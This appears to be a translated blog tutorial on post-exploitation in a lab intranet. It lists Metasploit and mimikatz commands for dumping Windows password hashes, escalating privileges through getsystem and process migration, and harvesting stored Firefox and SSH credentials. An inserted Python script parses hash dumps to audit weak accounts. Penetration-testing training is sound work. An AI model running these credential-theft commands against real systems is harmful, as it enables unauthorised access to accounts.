Intranet information collection of Intranet penetration (3)
2022-07-06 14:29:00 【Unknown white hat】
Contents
Metasploit Intranet information collection
Privilege escalation for ordinary users
Metasploit Intranet information collection
Attacker machine: Kali, 192.168.0.103
Target machine: Windows 7, 192.168.0.105
07 Password cracking
use post/windows/gather/hashdump // requires a meterpreter session with SYSTEM privileges
set session 1
exploit // the results are stored under the tmp directory
use post/windows/gather/smart_hashdump
set session 1
exploit
Format
Username:RID:LM-HASH value:NT-HASH value
The RID is a fixed value that corresponds to a Windows system account, similar to the uid and gid numbers on Linux: 500 is Administrator, 501 is Guest, and so on. The LM hash and the NT hash are both derived from the user's password, but they are computed with different methods.
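The same format is what an administrator reads when auditing a dump taken from a host they are responsible for. The following Python code is an added example, not part of the original post: it parses lines in this format and flags accounts with a stored LM hash, a blank password, or a password shared with another account. It assumes the trailing `:::` that hashdump prints after the NT hash; the sample lines and their non-empty hash values are constructed.

```python
import re
from collections import defaultdict

EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"  # LM hash of an empty password
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"  # NT hash of an empty password
WELL_KNOWN_RIDS = {500: "built-in Administrator", 501: "built-in Guest"}
LINE_RE = re.compile(r"^([^:]+):(\d+):([0-9a-fA-F]{32}):([0-9a-fA-F]{32}):*$")

# Constructed sample data; the non-empty hash values are made up.
SAMPLE = """\
Administrator:500:aad3b435b51404eeaad3b435b51404ee:0123456789abcdef0123456789abcdef:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
alice:1001:11111111111111112222222222222222:0123456789abcdef0123456789abcdef:::
bob:1002:aad3b435b51404eeaad3b435b51404ee:fedcba9876543210fedcba9876543210:::
not a hash line
"""

def parse(text):
    """Return one dict per well-formed line; malformed lines are skipped."""
    records = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            user, rid, lm, nt = m.groups()
            records.append({"user": user, "rid": int(rid),
                            "lm": lm.lower(), "nt": nt.lower()})
    return records

def audit(records):
    """Map each user name to a list of findings worth remediating."""
    by_nt = defaultdict(list)
    for r in records:
        by_nt[r["nt"]].append(r["user"])
    findings = {}
    for r in records:
        notes = [WELL_KNOWN_RIDS[r["rid"]]] if r["rid"] in WELL_KNOWN_RIDS else []
        if r["lm"] != EMPTY_LM:
            notes.append("LM hash stored")  # LM storage should be disabled
        if r["nt"] == EMPTY_NT:
            notes.append("blank password")
        elif len(by_nt[r["nt"]]) > 1:
            others = [u for u in by_nt[r["nt"]] if u != r["user"]]
            notes.append("same password as " + ", ".join(others))
        findings[r["user"]] = notes
    return findings

if __name__ == "__main__":
    for user, notes in audit(parse(SAMPLE)).items():
        print(f"{user}: {'; '.join(notes) or 'no findings'}")
```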
hashdump uses part of the functionality of mimikatz
load mimikatz
wdigest, kerberos, msv, ssp, tspkg, livessp
mimikatz_command -h
mimikatz_command -f a:: // Query which modules are available
mimikatz_command -f samdump::hashes
mimikatz_command -f samdump::bootkey
Privilege escalation for ordinary users
getuid
View the current user's permissions
hashdump
Requires administrator permission
getsystem
This only appears to obtain administrator permission; some real administrator privileges are still missing
ps
List processes
getpid
View the current process
migrate
Process migration (migrate from an ordinary user's process to an administrator user's process)
hashdump
08 Other
Determine whether the target host is a virtual machine:
run checkvm
Get the software installation information on the target host:
run post/windows/gather/enum_applications
Get the most recently accessed documents and link information on the target host:
run post/windows/gather/dumplinks
View the target environment information:
run post/windows/gather/env
View the accounts and passwords stored in Firefox:
run post/windows/gather/firefox_creds
View the ciphertext of SSH account passwords and the certificate information:
run post/windows/gather/ssh_creds